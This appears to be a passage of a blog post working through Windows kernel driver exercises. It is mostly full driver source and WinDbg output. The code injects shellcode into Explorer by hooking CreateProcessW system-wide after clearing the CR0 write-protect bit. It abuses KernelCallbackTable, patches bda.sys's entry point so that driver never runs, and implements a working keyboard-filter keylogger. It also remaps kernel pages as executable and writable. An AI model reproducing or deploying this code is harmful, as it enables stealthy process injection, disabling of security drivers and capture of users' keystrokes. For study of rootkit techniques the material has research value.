      AddressOfNameOrdinals = ((unsigned __int16 *)(*((unsigned __int32 *)(export_table + 0x24)) + image_base))[count];  
      AddressOfFunctions = ((unsigned __int32 *)(*((unsigned __int32 *)(export_table + 0x1c)) + image_base))[AddressOfNameOrdinals] + image_base;  
      // (copy the first API instructions in the stub, already done)  
      // patch the stub of the shellcode to make the last jmp point to the third instruction of CreateProcessW (api + 0x0C)  
      pShellcode = *(unsigned __int64 *)SystemArgument1;  
      *((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-4]) = (unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x0C);  
      // patch the opcode that compares the current PID with the PID of the target process  
      *((unsigned __int32 *)&((char *)pShellcode)[sizeof(buffer)-0x45]) = (unsigned __int32)PsGetProcessId(*((PEPROCESS*)SystemArgument2));  
      cr0 = __readcr0();  
      __writecr0(cr0 & 0xfffeffff);  
      // patch the API address to jmp to the stub, this patch will be visible to all processes  
      // since removing the Write-Protect flag also disables the Copy-On-Write  
      ((char *)AddressOfFunctions)[0] = 0xe9;  
      *(unsigned __int32 *)(AddressOfFunctions + 1) = 0 - ((unsigned __int32)(AddressOfFunctions - (unsigned __int64)pShellcode - sizeof(buffer) + 0x56));  

As anticipated earlier, this routine hooks the CreateProcessW API by overwriting its first opcodes with a JMP to the shellcode (specifically, to its offset marked with the "Entry" comment) and by patching some of its opcodes with parameters that are available only at run-time. In particular, these parameters are: the address of the third instruction of CreateFileW and the the PID of the target process.
There is still one interesting detail that we haven't discussed yet. In order to perform the hook, the KernelRoutine disables the WriteProtect flag from the CR0 register, which allows the code to write on any present memory page, even if it is marked as read only. However, 
this has also the side effect of disabling the copy-on-write, and we will see how this is going to be addressed.
Normally, a physical memory page of code from a system DLL is shared among all processes' virtual memory. If a process decides to patch such code (e.g. an API), the OS would detect the write attempt and would allocate a dedicated physical memory page to the patching process so that it would remain localized and would not affect the other processes. However, if the WriteProtect is disabled, the OS will not react to the write attempt and thus will not allocate a dedicated physical page for the patch. This means that the patch is effectively operating on all the running processes, but not all of them have a shellcode to jump to. Therefore, to prevent crashing them, the shellcode needs to verify that the current Pid is indeed the one of Explorer.
Notein cases in which the kernel routine needs to modify sensitive areas of memory, some extra care is generally required. For example, it may be necessary to: disable the interrupts (possibly on all the CPUs by scheduling a DPC); use atomic operations; use proper synchronization. In my case, the driver was tested on a machine with a single CPU, therefore once the interrupts are disabled with _disable(), it is pretty safe to patch the code  and disable the WriteProtect without atomic operations or synchronization.

Method 3
I tried to work on a third method, which proved to be unstable and therefore cannot be used, however I think it deserves some attention. This method tries to harness the kernelmode API KeUserModeCallback in order to run code in usermode.
The OS maintains a table of usermode callback routines, which is located in usermode and is pointed by PEB.KernelCallbackTable. In particular, these callbacks can be called from kernelmode with the API KeUserModeCallback, that takes in input the index of the desired function within the table. Thus, by inserting a pointer to the shellcode inside this table, I can manage to call it from kernelmode and have it executed in usermode.

The code encompasses some changes. A first difference is at the end of the shellcode:
 0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xcd, 0x2b, 0xc3  
which ends with an "int 2b" (0xcd 0x2b) and a "ret" (0xC3). We will see later why.

Another modification occurs in the DriverEntry, when the KAPC structure is initialized:

PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)(baseaddr + 0x35A), UserMode, NULL);
if(!PKeInsertQueueApc(pApc, baseaddr, p_proc, 0))  

The code uses again a dummy normal routine: in fact, the "baseaddr + 0x35a" parameter refers to the last byte of the shellcode (the RET). If a normal routine is not provided, the system seems to crash. 

Finally, the KernelRoutine is the one that changes significantly and does the actual job of overwriting an entry in the KernelCallbackTable :
 VOID KernelRoutine(struct _KAPC *Apc,   
      PKNORMAL_ROUTINE *NormalRoutine,   
      PVOID *NormalContext,   
      PVOID *SystemArgument1,   // address of usermode code  
      PVOID *SystemArgument2 )  // pEPROCESS  
      NTSTATUS status_code;  
      UNICODE_STRING apiName;  
      NTSTATUS (*pKeUserModeCallback)(ULONG apiNumber, void* inputBuffer, ULONG inputLength, void** outputBuffer, ULONG* outputLength);  
      unsigned __int64 peb, callback_table;  
      unsigned __int64 cr0;  
      KIRQL apc_irql, old_irql;    
      DbgPrint("APC kernel routine\n");  
      RtlInitUnicodeString(&apiName, L"KeUserModeCallback");  
      pKeUserModeCallback = MmGetSystemRoutineAddress(&apiName);   
      if(pKeUserModeCallback == NULL)  
           DbgPrint("Cannot find pKeUserModeCallback\n");  
      DbgPrint("Usermode address: %016x \n", SystemArgument1);  
      // retrieve PEB address     
      peb = ((unsigned __int64 *)SystemArgument2)[0];  
      peb = ((unsigned __int64*)( ((UCHAR *)peb) + 0x338 ))[0];  
      // retrieve kernel callback table     
      callback_table = ((unsigned __int64*)(((UCHAR *)peb) + 0x58))[0] ;  
      // insert shellcode address into an empty function slot (slot n 0x76, 0x76*8 = 3b0)     
      callback_table += 0x3b0;   
      cr0 = __readcr0();  
      __writecr0(cr0 & 0xfffeffff);  
      ((unsigned __int64*)callback_table)[0] = (unsigned __int64)((unsigned __int64 *)SystemArgument1)[0];  
      // call it, but first...  be careful:       
      // usermode callbacks can only run at PASSIVE, or else bugcheck IRQL_GT_ZERO_AT_SYSTEM_SERVICE  
      apc_irql = KeGetCurrentIrql();  
      status_code = pKeUserModeCallback(0x76, 0, 0, 0, 0);  
      KeRaiseIrql(apc_irql, &old_irql);

      // ** from user mode to terminate do  xor ecx, ecx / xor edx, edx / int 2b (see shellcode) **

I chose to overwrite the table entry at index 0x76 because in my system it was always zero, but it would be preferable to have a more generic approach to find an empty entry. Once the table entry is written with the pointer to the shellcode, the driver lowers the IRQL to PASSIVE_LEVEL (it will be restored later) and issues a call to KeUserModeCallback with 0x76 as index. The routine gets executed (Notepad starts successfully) and when the usermode code has finished its task, it returns back to the kernel by issuing an int 2b. Unfortunately, when the routine ends, it crashes. I made some tests and experiments, trying to figure out if it was a problem related to the stack, but I always ended up with a crash (a usermode one, not BSOD). In the end, I did not proceed in further investigating this issue, but I believe that it should be possible to make this method stable and reliable.

To protect a shared memory resource (allocated in nonpaged memory) in a SMP environment I would use a spinlock: the routines responsible to access the resource would need to acquire the spinlock in order to read or write the data. 
Before acquiring a spinlock, the system raises the IRQL at Dispatch level so that other threads cannot preempt the CPU, then it attempts to obtain the ownership of the spinlock by continuously checking its availability in a loop (that is, spinning). This mechanism ensures that only one thread from one CPU at a time is accessing the shared data and it is quite efficient, assuming that the lock is not being held for a long time.

 #include <Ntifs.h>  
 #include <string.h>  
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
 typedef struct _IMAGE_DOS_HEADER  
      WORD e_magic;  
      WORD e_cblp;  
      WORD e_cp;  
      WORD e_crlc;  
      WORD e_cparhdr;  
      WORD e_minalloc;  
      WORD e_maxalloc;  
      WORD e_ss;  
      WORD e_sp;  
      WORD e_csum;  
      WORD e_ip;  
      WORD e_cs;  
      WORD e_lfarlc;  
      WORD e_ovno;  
      WORD e_res[4];  
      WORD e_oemid;  
      WORD e_oeminfo;  
      WORD e_res2[10];  
      LONG e_lfanew;  
 typedef struct _IMAGE_FILE_HEADER {  
      WORD Machine;  
      WORD NumberOfSections;  
      DWORD TimeDateStamp;  
      DWORD PointerToSymbolTable;  
      DWORD NumberOfSymbols;  
      WORD SizeOfOptionalHeader;  
      WORD Characteristics;  
 typedef struct _IMAGE_DATA_DIRECTORY {  
      DWORD VirtualAddress;  
      DWORD Size;  
  typedef struct _IMAGE_OPTIONAL_HEADER64 {  
      WORD Magic; /* 0x20b */  
      BYTE MajorLinkerVersion;  
      BYTE MinorLinkerVersion;  
      DWORD SizeOfCode;  
      DWORD SizeOfInitializedData;  
      DWORD SizeOfUninitializedData;  
      DWORD AddressOfEntryPoint;  
      DWORD BaseOfCode;  
      ULONGLONG ImageBase;  
      DWORD SectionAlignment;  
      DWORD FileAlignment;  
      WORD MajorOperatingSystemVersion;  
      WORD MinorOperatingSystemVersion;  
      WORD MajorImageVersion;  
      WORD MinorImageVersion;  
      WORD MajorSubsystemVersion;  
      WORD MinorSubsystemVersion;  
      DWORD Win32VersionValue;  
      DWORD SizeOfImage;  
      DWORD SizeOfHeaders;  
      DWORD CheckSum;  
      WORD Subsystem;  
      WORD DllCharacteristics;  
      ULONGLONG SizeOfStackReserve;  
      ULONGLONG SizeOfStackCommit;  
      ULONGLONG SizeOfHeapReserve;  
      ULONGLONG SizeOfHeapCommit;  
      DWORD LoaderFlags;  
      DWORD NumberOfRvaAndSizes;  
 typedef struct _IMAGE_NT_HEADERS64 {  
      DWORD Signature;  
      IMAGE_FILE_HEADER FileHeader;  
      IMAGE_OPTIONAL_HEADER64 OptionalHeader;  
 #ifdef ALLOC_PRAGMA  
 #pragma alloc_text( INIT, DriverEntry )  
      PUNICODE_STRING FullImageName,  
      HANDLE ProcessId,  
      PIMAGE_INFO ImageInfo  
      WCHAR *drivername;  
      UNICODE_STRING servicename;  
      NTSTATUS unload;  
      UINT8 * entry_point;  
      unsigned __int64 cr0;  
      char patch[] = {0xb8, 0x01, 0x00, 0x00, 0xc0, 0xc3};  
           // ignore usermode images  
      if(FullImageName->Length >= 8*sizeof(WCHAR))  
           drivername = FullImageName->Buffer + (FullImageName->Length/sizeof(WCHAR)) - 8;  
           if(wcsncmp(drivername, L"\\bda.sys", 8) == 0)  
                DbgPrint("bda.sys diver detected! imagebase %p \n", (UINT8*)ImageInfo->ImageBase);  
                MZ = (IMAGE_DOS_HEADER *) ImageInfo->ImageBase;  
                PE = (PIMAGE_NT_HEADERS64) ( ((UINT8*)ImageInfo->ImageBase) + MZ->e_lfanew);  
                entry_point = PE->OptionalHeader.AddressOfEntryPoint + (UINT8*)ImageInfo->ImageBase;  
                cr0 = __readcr0();  
                __writecr0(cr0 & 0xfffeffff);  
                // b8 01 00 00 c0   mov  eax, 0xc0000001  
                // c3         ret  
                memcpy(entry_point , &patch, sizeof(patch));  
 VOID MyUnload(__in PDRIVER_OBJECT DriverObject)  
 DriverEntry(PDRIVER_OBJECT  DriverObject, PUNICODE_STRING RegistryPath)  
      DriverObject->DriverUnload = &MyUnload;   
      return STATUS_SUCCESS;  

The driver installs a load image notify routine via PsSetImageNotifyRoutine. This routine verifies if the name of the loaded image is bda.sys, and if it is, it patches its entry point with assembly instructions equivalent to:

The load image notify routine is called after the driver is mapped in memory, but before its entry point is executed. Thus, patching the entry point with the above code will cause the driver to report a failure in loading and the OS will unload bda.sys from memory without executing any other code from it.
Finally, when the driver is unloaded, the callback to the load image notify routine is removed via PsRemoveLoadImageNotifyRoutine.

 #include <ntddkbd.h>  
 typedef struct _DEVICE_EXTENSION   
   PDEVICE_OBJECT pTargetDevice;   

 #include <ntddk.h>  
 #include <string.h>  
 #include "sioctl.h"  
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
 #ifdef ALLOC_PRAGMA  
 #pragma alloc_text( INIT, DriverEntry )  
 PDEVICE_OBJECT kbd_class_dev = NULL;  
 PDEVICE_OBJECT my_keyboard_dev = NULL;  
 // scan codes taken from (column Set 1)  
 #define SCAN_MAPPINGS 0x3b  
 unsigned char* scan_code_mapping[SCAN_MAPPINGS] = {  
 "<unk>", "<unk>", "1 or !", "2 or @", "3 or #", "4 or $", "5 or %", "6 or ^", "7 or &", "8 or *", "9 or (", "0 or )",  
 "- or _", "= or +", "Backspace", "Tab", "Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P", "[ or {", "] or }", "Enter", "LCtrl",  
 "A", "S", "D", "F", "G", "H", "J", "K", "L", "; or :", "' or \"", "` or ~", "LShift", "\\ or |",   
 "Z","X", "C", "V", "B", "N", "M", ", or <", ". or >", "/ or ?", "RShift", "<unk>", "LAlt", "space", "CapsLock"  
 VOID MyUnload(__in PDRIVER_OBJECT DriverObject)  
      DbgPrint("Unload routine\n");  
 NTSTATUS io_completion(PDEVICE_OBJECT DeviceObject, PIRP Irp, PVOID Context)  
      KEYBOARD_INPUT_DATA *key_buffer;  
      unsigned long key_number = 0, i;  
      // read data from the IRP, put it in key  
      if(Irp->IoStatus.Status == STATUS_SUCCESS)  
           // system buffer may contain an array of KEYBOARD_INPUT_DATA  
           // The size (in bytes) of the SystemBuffer is stored in Irp->IoStatus.Information  
           key_buffer = (PKEYBOARD_INPUT_DATA)Irp->AssociatedIrp.SystemBuffer;  
           if(Irp->IoStatus.Information != 0)  
                key_number = (unsigned long)(Irp->IoStatus.Information) / sizeof(KEYBOARD_INPUT_DATA);  
           for(i = 0; i < key_number; i++)  
                // only log char in a key release event, not key press  
                if(key_buffer[i].Flags == KEY_BREAK)  
                     if(key_buffer[i].MakeCode < SCAN_MAPPINGS)  
                          // translate and log the scan code  
                          DbgPrint("Key scancode: %s \n", scan_code_mapping[ key_buffer[i].MakeCode ]);  
      if(Irp->PendingReturned) IoMarkIrpPending(Irp);  
      return Irp->IoStatus.Status;  
 NTSTATUS kbd_mj_read(PDEVICE_OBJECT DeviceObject, PIRP Irp)  
      IoSetCompletionRoutine(Irp, io_completion, NULL, TRUE, TRUE, TRUE);  
      return IoCallDriver(((PDEVICE_EXTENSION)DeviceObject->DeviceExtension)->pTargetDevice, Irp);   
 NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)  
      NTSTATUS status_code;  
      UNICODE_STRING kbd_class_name;  
      PFILE_OBJECT kbd_class_file = NULL;  
      PDEVICE_EXTENSION device_ext;  
      int i;  
      DriverObject->DriverUnload = &MyUnload;  
      DriverObject->MajorFunction[IRP_MJ_READ] = &kbd_mj_read;  
      // create a new device  
      status_code = IoCreateDevice(DriverObject, sizeof(DEVICE_EXTENSION), NULL, FILE_DEVICE_KEYBOARD, 0, FALSE, &my_keyboard_dev);  
      if(status_code != STATUS_SUCCESS)  
           DbgPrint("Error creating device \n");  
           return STATUS_UNSUCCESSFUL;  
      // retrieve the keyboard class device   
      RtlInitUnicodeString(&kbd_class_name, L"\\Device\\KeyboardClass0");  
      status_code = IoGetDeviceObjectPointer(&kbd_class_name, FILE_READ_ATTRIBUTES, &kbd_class_file, &kbd_class_dev);  
      if(status_code != STATUS_SUCCESS)  
           DbgPrint("Error getting keyboard class object \n");  
           return STATUS_UNSUCCESSFUL;  
      // set the device extension for the new device and attach it to class device     
      RtlZeroMemory(my_keyboard_dev->DeviceExtension, sizeof(DEVICE_EXTENSION));  
      device_ext = (PDEVICE_EXTENSION)my_keyboard_dev->DeviceExtension;  
      device_ext->pTargetDevice = IoAttachDeviceToDeviceStack(my_keyboard_dev, kbd_class_dev);  
      if(device_ext->pTargetDevice == NULL)  
           DbgPrint("Error attaching to keyboard device \n");  
           return STATUS_UNSUCCESSFUL;  
      // important! Set the correct flags for the new device, especially DO_BUFFERED_IO, or else  
      // the new device won't have any flag set, and IRP.AssociatedIrp.SystemBuffer will be zero  
      // causing the system to copy the scancode data to a NULL buffer, which will bsod  
      my_keyboard_dev->Flags = kbd_class_dev->Flags;  
      return STATUS_SUCCESS;  

The driver implements a basic keylogger. It attaches its device object to the keyboard device stack and filters the IRPs going to it. In particular, the device object is created via IoCreateDevice, passing FILE_DEVICE_KEYBOARD as the DeviceType and setting its DeviceExtension to target the keyboard device stack via IoAttachDeviceToDeviceStack. The keyboard device is obtained via IoGetDeviceObjectPointer, by specifying \\Device\\KeyboardClass0 as the ObjectName. The flags of the keyboard device are actually used to set the ones of the newly created device object, as explained in the source code.
Moreover, the MajorFunction[IRP_MJ_READ] entry (in the driver object) is set to a simple pass-through function, that receives an IRP, sets a completion routine (via IoSetCompletionRoutine), copies the current stack location to the next device stack location (via IoCopyCurrentIrpStackLocationToNext) and calls its IRP_MJ_READ function (via IoCallDriver). The completion routine processes the IRP after the keyboard driver has filled it with the information about the received keystroke. The driver simply inspects each KEYBOARD_INPUT_DATA structure from the output buffer (stored in IRP.AssociatedIrp.SystemBuffer) and retrieves the keystroke scan codes. 
I used standard scan codes to perform a very basic mapping of the keystrokes to the relative characters, however such translation is in general way more complicated than this implementation.
During the unloading of the driver, the device will be first detached from the keyboard one (via IoDetachDevice) and then deleted (via IoDeleteDevice).

The first implementation I wrote is the following:
 #include <ntifs.h>  
 #include <string.h>   
 #define WORD  UINT16  
 #define DWORD UINT32  
 #define BYTE  UINT8  
 VOID MyUnload(PDRIVER_OBJECT DriverObject)  
      DbgPrint("Unload routine\n");  
 // return value: 0 = success, nonzero = error  
 int change_protection(BYTE *virtual_address, ULONG length, PMDL *Mdl, PVOID *address)  
      *Mdl = IoAllocateMdl(virtual_address, length, 0, 0, NULL);  
      if(Mdl == NULL)  
           return 1;  
      MmProbeAndLockPages(*Mdl, KernelMode, IoReadAccess);  
      *address = MmMapLockedPagesSpecifyCache(*Mdl, KernelMode, MmNonCached, (PVOID)virtual_address, FALSE, NormalPagePriority);  
      if(*address == NULL)  
           return 2;  
      DbgPrint("Mapped address: %lx \n", *address);  
      if(MmProtectMdlSystemAddress(*Mdl, PAGE_EXECUTE_READWRITE) != STATUS_SUCCESS)  
           return 3;  
      return 0;  
 void unmap_mdl(PMDL *Mdl, PVOID *Address)  
      MmUnmapLockedPages(*Address, *Mdl);  
 NTSTATUS DriverEntry(DRIVER_OBJECT *DriverObject, PUNICODE_STRING RegistryPath)  
      NTSTATUS status_code;  
      BYTE *nonpaged_address;  
      int code;  
      PMDL pMdl;  
      BYTE *new_address;   
      DriverObject->DriverUnload = MyUnload;  
      // taken from monitor.sys (mapped in the range fffff880`0459f000 - fffff880`045ad000)
      nonpaged_address = (BYTE *)0xfffff8800459f000;  
      code = change_protection(nonpaged_address, 0x10, &pMdl, (void*)&new_address);  
      DbgPrint("change protection return value: %d \n", code);  
      unmap_mdl(&pMdl, (void*)&new_address);  
      return STATUS_SUCCESS;  

The driver creates a MDL associated to a virtual address, then probes and locks it and finally maps it to a new virtual address. As an extra, I call the function MmProtectMdlSystemAddress to ensure that the RWX protection is set, but by debugging I have noticed that such protection is already in place after MmMapLockedPagesSpecifyCache (MmBuildMdlForNonPagedPool would have been more appropriate normally, but for the sake of this exercise it can be ignored). After the work is done, the MDL is released by unmapping its pages and deallocating it.

To verify that the protection is successfully changed, I made a simple test. I used the !pte debugger extension to translate the virtual address of the imagebase of monitor.sys:

kd> !pte 0xfffff8800459f000
VA fffff8800459f000

contains 000000003BF84863
pfn 3bf84     ---DA--KWEV

contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200110  
contains 0000000020CEE863
pfn 20cee     ---DA--KWEV

contains 800000003CDD7963
pfn 3cdd7     -G-DA--KW-V

(the command output has been edited for better readability)

Then, I repeated the test by using the virtual address that I obtained with MmMapLockedPagesSpecifyCache:

kd> !pte fffff8800d249000
VA fffff8800d249000

contains 000000003BF84863

pfn 3bf84     ---DA--KWEV

contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200348  
contains 0000000035879863
pfn 35879     ---DA--KWEV

PTE at FFFFF6FC40069248
contains 000000003CDD7963
pfn 3cdd7     -G-DA--KWEV

The log shows that while the former lacks the executable protection, the latter does not.
As suggested by the exercise, I tested the same code using the imagebase address of win32k.sys, that is a session space address, and the system crashed with a BSOD. A quick investigation revealed the problem: the DriverEntry routine is called in the context of the System process, which is not associated to any session. Thus, the session space virtual addresses are not available and cannot be used to build MDLs.
I experimented a bit and found a simple trick to bypass this problem: if the System process is not associated to a session, the code should work if it is run from the context of a process that is associated to a session. This is a simple modification that would make the driver code work:
      KAPC_STATE apcstate;  
      // taken from fffff960`00060000 fffff960`00370000  win32k   
      KeStackAttachProcess((PEPROCESS)0xfffffa8002d7a770, &apcstate); // explorer peprocess  
      nonpaged_address = (BYTE *)0xfffff96000060000;  
      code = change_protection(nonpaged_address, 0x10);  
      DbgPrint("change protection return value: %d \n", code);  

I used KeStackAttachProcess in order to get in the context of Explorer.exe, which is associated to the currently logged in user, but any other process run inside the same login session would have worked (the PEPROCESS is hardcoded just for this test). Debugging this code, I tested the accessibility of win32k.sys imagebase address via WinDbg before the driver attached to Explorer:

kd> !pte 0xfffff96000060000
VA fffff96000060000

contains 0000000000000000

not valid

kd> db 0xfffff96000060000
fffff960`00060000  ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  ????????????????

Translating the virtual address to a physical one shows an invalid PTE, and even dumping the bytes from that memory address returns no data. However, as soon as I step beyond KeStackAttachProcess the address becomes available:

kd> !pte fffff960`00060000

VA fffff96000060000

contains 00000000184BC863

pfn 184bc     ---DA--KWEV

contains 0000000018ACD863
pfn 18acd     ---DA--KWEV

PDE at FFFFF6FB7E580000  
contains 0000000018DCC863
pfn 18dcc     ---DA--KWEV

PTE at FFFFF6FCB0000300
contains 8030000012588201
pfn 12588     C------KR-V

and the driver code works too, creating a mapping with RWX attribute:

kd> !pte fffff8800e0b4000
VA fffff8800e0b4000

contains 000000003BF84863
pfn 3bf84     ---DA--KWEV

contains 000000003BF83863
pfn 3bf83     ---DA--KWEV

PDE at FFFFF6FB7E200380  
contains 0000000030237863
pfn 30237     ---DA--KWEV

PTE at FFFFF6FC400705A0
contains 0000000012588963

pfn 12588     -G-DA--KWEV

If I step further down with the debugger, and go after KeUnstackDetachProcess, the address becomes dead again.

To figure out which function is calling the DriverEntry I have: written a dummy driver; set a breakpoint on its entry point with DbgBreakPoint(); run it under kernel debugging so that I could dump the stack.


The dump shows the functions that were called right before the DriverEntry. The direct responsible for calling the entry point is IopLoadDriver, which is in turn called by IopLoadUnloadDriver. This function manages both the loading and unloading of a driver (calling the entry point or the driver unload routine respectively), and it is called by a dedicated system thread, as can be noted by the three functions ExpWorkerThread, PspSystemThreadStartup and KxStartSystemThread.

No comments:

Post a Comment